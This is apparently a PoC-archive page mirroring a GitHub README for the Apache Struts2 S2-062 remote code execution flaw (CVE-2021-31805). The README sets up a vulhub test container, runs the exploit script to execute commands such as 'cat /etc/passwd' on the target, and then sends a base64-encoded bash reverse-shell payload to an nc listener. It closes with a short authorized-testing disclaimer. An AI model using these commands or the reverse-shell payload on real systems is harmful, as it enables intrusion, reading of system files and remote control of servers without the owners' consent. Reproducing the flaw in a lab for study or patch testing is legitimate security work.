Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-31805 PoC — Forced OGNL evaluation, when evaluated on raw not validated user input in tag attributes, may lead to RCE.

Source
https://github.com/SecNN/Struts2_S2-062_CVE-2021-31805
Associated Vulnerability
Title:Forced OGNL evaluation, when evaluated on raw not validated user input in tag attributes, may lead to RCE. (CVE-2021-31805)
Description:The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag’s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.
Description
Apache Struts2 S2-062远程代码执行漏洞(CVE-2021-31805) | 反弹Shell
Readme
# Struts2_S2-062_CVE-2021-31805
Apache Struts2 S2-062远程代码执行漏洞(CVE-2021-31805)  | 反弹Shell
# 漏洞复现环境

docker-compose.yml
```
version: '2'
services:
 struts2:
   image: vulhub/struts2:2.5.25
   ports:
    - "8080:8080"
```
拉取镜像启动环境
```
docker-compose up -d
```
访问地址:http://1.1.1.1:8080
# 漏洞验证脚本
```
python Struts2_S2-062_CVE-2021-31805.py http://1.1.1.1:8080/index.action "cat /etc/passwd"
```
![passwd](./images/passwd.png)
```
python Struts2_S2-062_CVE-2021-31805.py http://1.1.1.1:8080/index.action whoami
```
![root](./images/root.png)
```
python Struts2_S2-062_CVE-2021-31805.py http://1.1.1.1:8080/index.action id
```
![id](./images/id.png)
# 反弹Shell
## NC开启端口监听
```
nc -lvvp 8081
```
![NC](./images/NC.png)

构造base64编码反弹shell脚本,利用如下网站生成:https://ir0ny.top/pentest/reverse-encoder-shell.html
![base64](./images/base64.png)
## 获取Shell
```
python CVE-2021-31805_Shell.py http://1.1.1.1:8080/index.action "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvODA4MCAwPiYx}|{base64,-d}|{bash,-i}"
```
![shell](./images/shell.png)

## 成功获取Shell

![Shell_code](./images/Shell_code.png)


# 免责声明
请勿用于非法的用途,仅做安全测试,否则造成的后果与本项目无关。
注:要在正规授权情况下测试网站:日站不规范,亲人泪两行。
File Snapshot

 [4.0K]  /data/pocs/f1be6d3a04d6d6831d107b3b702cf9ba20149e59
├── [2.0K]  CVE-2021-31805_Shell.py
├── [4.0K]  images
│   ├── [ 35K]  base64.png
│   ├── [ 11K]  id.png
│   ├── [ 70K]  NC.png
│   ├── [ 53K]  passwd.png
│   ├── [   1]  README.md
│   ├── [ 10K]  root.png
│   ├── [296K]  Shell_code.png
│   └── [ 49K]  shell.png
├── [1.4K]  README.md
├── [  52]  requirements.txt
└── [2.1K]  Struts2_S2-062_CVE-2021-31805.py

1 directory, 12 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →